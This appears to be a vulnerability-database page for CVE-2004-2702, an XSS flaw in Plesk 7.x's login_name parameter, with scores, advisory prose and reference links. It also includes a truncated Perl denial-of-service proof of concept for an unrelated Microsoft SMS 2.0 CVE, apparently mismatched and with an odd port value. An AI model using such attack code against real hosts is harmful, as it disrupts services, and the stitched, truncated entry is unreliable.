CVE-2004-2702
published 2004-12-31CVE-2004-2702: Cross-site scripting (XSS) vulnerability in login_up.php3 in Plesk 7.0 and 7.1 Reloaded allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.93%
77.4th percentile
Cross-site scripting (XSS) vulnerability in login_up.php3 in Plesk 7.0 and 7.1 Reloaded allows remote attackers to inject arbitrary web script or HTML via the login_name parameter. NOTE: this might be the same vector as CVE-2006-6451.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| swsoft | plesk | — | — |
| swsoft | plesk | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SWsoft Plesk Reloaded 7.1 - 'Login_name' Cross-Site Scripting
exploitdb·2004-08-24
CVE-2004-2702 SWsoft Plesk Reloaded 7.1 - 'Login_name' Cross-Site Scripting
SWsoft Plesk Reloaded 7.1 - 'Login_name' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/11024/info
It is reported that Plesk Reloaded may be affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.
This issue was identified in the demo version of Plesk Reloaded 7.1. It is likely that other versions are affected
Exploit-DB
Microsoft Windows SMS 2.0 - Denial of Service
exploitdb·2004-07-24
CVE-2004-0728 Microsoft Windows SMS 2.0 - Denial of Service
Microsoft Windows SMS 2.0 - Denial of Service
---
#!/usr/bin/perl
#############################
#
# SMS DOS proof of concept and test code
#
#############################
use Socket;
use IO::Socket;
if (@ARGV != 1)
{
print "usage: $0 \n";
exit;
}
$host = shift(@ARGV);
$hexmsg = converthex("5243483016004000524348455858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858");
print "\nCreating socket for connection to: $host\n\n";
my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => "(2702)", Proto
=> "tcp") or die("Could not create socket: $!\n");
$sock1->autoflush(1)
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2004-08/1022.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2004-08/1031.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2004-12/0554.htmlhttp://secunia.com/advisories/12368http://securitytracker.com/id?1011042http://www.osvdb.org/9149http://www.securityfocus.com/bid/11024https://exchange.xforce.ibmcloud.com/vulnerabilities/17085http://archives.neohapsis.com/archives/fulldisclosure/2004-08/1022.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2004-08/1031.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2004-12/0554.htmlhttp://secunia.com/advisories/12368http://securitytracker.com/id?1011042http://www.osvdb.org/9149http://www.securityfocus.com/bid/11024https://exchange.xforce.ibmcloud.com/vulnerabilities/17085
2004-12-31
Published